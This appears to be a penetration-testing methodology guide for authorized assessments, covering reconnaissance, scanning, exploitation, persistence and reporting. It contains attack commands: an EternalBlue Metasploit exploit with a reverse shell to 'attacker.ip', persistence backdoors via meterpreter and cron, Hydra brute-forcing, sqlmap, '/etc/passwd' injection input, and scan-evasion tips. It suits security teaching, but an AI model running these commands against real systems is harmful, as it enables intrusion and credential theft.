Ethical Hacking Methodology

Purpose

Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.

Prerequisites

Required Environment

• Kali Linux installed (persistent or live)

• Network access to authorized targets

• Written authorization from system owner

Required Knowledge

• Basic networking concepts

• Linux command-line proficiency

• Understanding of web technologies

• Familiarity with security concepts

Outputs and Deliverables

• Reconnaissance Report - Target information gathered

• Vulnerability Assessment - Identified weaknesses

• Exploitation Evidence - Proof of concept attacks

• Final Report - Executive and technical findings

Core Workflow

Phase 1: Understanding Hacker Types

Classification of security professionals:

White Hat Hackers (Ethical Hackers)

• Authorized security professionals

• Conduct penetration testing with permission

• Goal: Identify and fix vulnerabilities

• Also known as: penetration testers, security consultants

Black Hat Hackers (Malicious)

• Unauthorized system intrusions

• Motivated by profit, revenge, or notoriety

• Goal: Steal data, cause damage

• Also known as: crackers, criminal hackers

Grey Hat Hackers (Hybrid)

• May cross ethical boundaries

• Not malicious but may break rules

• Often disclose vulnerabilities publicly

• Mixed motivations

Other Classifications

• Script Kiddies: Use pre-made tools without understanding

• Hacktivists: Politically or socially motivated

• Nation State: Government-sponsored operatives

• Coders: Develop tools and exploits

Phase 2: Reconnaissance

Gather information without direct system interaction:

Passive Reconnaissance

WHOIS lookup

whois target.com

DNS enumeration

nslookup target.com dig target.com ANY dig target.com MX dig target.com NS

Subdomain discovery

dnsrecon -d target.com

Email harvesting

theHarvester -d target.com -b all

Google Hacking (OSINT)

Find exposed files

site:target.com filetype:pdf site:target.com filetype:xls site:target.com filetype:doc

Find login pages

site:target.com inurl:login site:target.com inurl:admin

Find directory listings

site:target.com intitle:"index of"

Find configuration files

site:target.com filetype:config site:target.com filetype:env

Google Hacking Database Categories:

• Files containing passwords

• Sensitive directories

• Web server detection

• Vulnerable servers

• Error messages

• Login portals

Social Media Reconnaissance

• LinkedIn: Organizational charts, technologies used

• Twitter: Company announcements, employee info

• Facebook: Personal information, relationships

• Job postings: Technology stack revelations

Phase 3: Scanning

Active enumeration of target systems:

Host Discovery

Ping sweep

nmap -sn 192.168.1.0/24

ARP scan (local network)

arp-scan -l

Discover live hosts

nmap -sP 192.168.1.0/24

Port Scanning

TCP SYN scan (stealth)

nmap -sS target.com

Full TCP connect scan

nmap -sT target.com

UDP scan

nmap -sU target.com

All ports scan

nmap -p- target.com

Top 1000 ports with service detection

nmap -sV target.com

Aggressive scan (OS, version, scripts)

nmap -A target.com

Service Enumeration

Specific service scripts

nmap --script=http-enum target.com nmap --script=smb-enum-shares target.com nmap --script=ftp-anon target.com

Vulnerability scanning

nmap --script=vuln target.com

Common Port Reference

Port Service Notes

21 FTP File transfer

22 SSH Secure shell

23 Telnet Unencrypted remote

25 SMTP Email

53 DNS Name resolution

80 HTTP Web

443 HTTPS Secure web

445 SMB Windows shares

3306 MySQL Database

3389 RDP Remote desktop

Phase 4: Vulnerability Analysis

Identify exploitable weaknesses:

Automated Scanning

Nikto web scanner

nikto -h http://target.com

OpenVAS (command line)

omp -u admin -w password --xml="<get_tasks/>"

Nessus (via API)

nessuscli scan --target target.com

Web Application Testing (OWASP)

• SQL Injection

• Cross-Site Scripting (XSS)

• Broken Authentication

• Security Misconfiguration

• Sensitive Data Exposure

• XML External Entities (XXE)

• Broken Access Control

• Insecure Deserialization

• Using Components with Known Vulnerabilities

• Insufficient Logging & Monitoring

Manual Techniques

Directory brute forcing

gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

Subdomain enumeration

gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

Web technology fingerprinting

whatweb target.com

Phase 5: Exploitation

Actively exploit discovered vulnerabilities:

Metasploit Framework

Start Metasploit

msfconsole

Search for exploits

msf> search type:exploit name:smb

Use specific exploit

msf> use exploit/windows/smb/ms17_010_eternalblue

Set target

msf> set RHOSTS target.com

Set payload

msf> set PAYLOAD windows/meterpreter/reverse_tcp msf> set LHOST attacker.ip

Execute

msf> exploit

Password Attacks

Hydra brute force

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com hydra -L users.txt -P passwords.txt ftp://target.com

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Web Exploitation

SQLMap for SQL injection

sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" -D database --tables

XSS testing

Manual: <script>alert('XSS')</script>

Command injection testing

; ls -la

| cat /etc/passwd

Phase 6: Maintaining Access

Establish persistent access:

Backdoors

Meterpreter persistence

meterpreter> run persistence -X -i 30 -p 4444 -r attacker.ip

SSH key persistence

Add attacker's public key to ~/.ssh/authorized_keys

Cron job persistence

echo "* * * * * /tmp/backdoor.sh" >> /etc/crontab

Privilege Escalation

Linux enumeration

linpeas.sh linux-exploit-suggester.sh

Windows enumeration

winpeas.exe windows-exploit-suggester.py

Check SUID binaries (Linux)

find / -perm -4000 2>/dev/null

Check sudo permissions

sudo -l

Covering Tracks (Ethical Context)

• Document all actions taken

• Maintain logs for reporting

• Avoid unnecessary system changes

• Clean up test files and backdoors

Phase 7: Reporting

Document findings professionally:

Report Structure

Executive Summary

• High-level findings

• Business impact

• Risk ratings

• Remediation priorities

Technical Findings

• Vulnerability details

• Proof of concept

• Screenshots/evidence

• Affected systems

Risk Ratings

• Critical: Immediate action required

• High: Address within 24-48 hours

• Medium: Address within 1 week

• Low: Address within 1 month

• Informational: Best practice recommendations

Remediation Recommendations

• Specific fixes for each finding

• Short-term mitigations

• Long-term solutions

• Resource requirements

Appendices

• Detailed scan outputs

• Tool configurations

• Testing timeline

• Scope and methodology

Phase 8: Common Attack Types

Phishing

• Email-based credential theft

• Fake login pages

• Malicious attachments

• Social engineering component

Malware Types

• Virus: Self-replicating, needs host file

• Worm: Self-propagating across networks

• Trojan: Disguised as legitimate software

• Ransomware: Encrypts files for ransom

• Rootkit: Hidden system-level access

• Spyware: Monitors user activity

Network Attacks

• Man-in-the-Middle (MITM)

• ARP Spoofing

• DNS Poisoning

• DDoS (Distributed Denial of Service)

Phase 9: Kali Linux Setup

Install penetration testing platform:

Hard Disk Installation

• Download ISO from kali.org

• Boot from installation media

• Select "Graphical Install"

• Configure language, location, keyboard

• Set hostname and root password

• Partition disk (Guided - use entire disk)

• Install GRUB bootloader

• Reboot and login

Live USB (Persistent)

Create bootable USB

dd if=kali-linux.iso of=/dev/sdb bs=512k status=progress

Create persistence partition

gparted /dev/sdb

Add ext4 partition labeled "persistence"

Configure persistence

mkdir /mnt/usb mount /dev/sdb2 /mnt/usb echo "/ union" > /mnt/usb/persistence.conf umount /mnt/usb

Phase 10: Ethical Guidelines

Legal Requirements

• Obtain written authorization

• Define scope clearly

• Document all testing activities

• Report all findings to client

• Maintain confidentiality

Professional Conduct

• Work ethically with integrity

• Respect privacy of data accessed

• Avoid unnecessary system damage

• Execute planned tests only

• Never use findings for personal gain

Quick Reference

Penetration Testing Lifecycle

Stage Purpose Key Tools

Reconnaissance Gather information theHarvester, WHOIS, Google

Scanning Enumerate targets Nmap, Nikto, Gobuster

Exploitation Gain access Metasploit, SQLMap, Hydra

Maintaining Access Persistence Meterpreter, SSH keys

Reporting Document findings Report templates

Essential Commands

Command Purpose

nmap -sV target

Port and service scan

nikto -h target

Web vulnerability scan

msfconsole

Start Metasploit

hydra -l user -P list ssh://target

SSH brute force

sqlmap -u "url?id=1" --dbs

SQL injection

Constraints and Limitations

Authorization Required

• Never test without written permission

• Stay within defined scope

• Report unauthorized access attempts

Professional Standards

• Follow rules of engagement

• Maintain client confidentiality

• Document methodology used

• Provide actionable recommendations

Troubleshooting

Scans Blocked

Solutions:

• Use slower scan rates

• Try different scanning techniques

• Use proxy or VPN

• Fragment packets

Exploits Failing

Solutions:

• Verify target vulnerability exists

• Check payload compatibility

• Adjust exploit parameters

• Try alternative exploits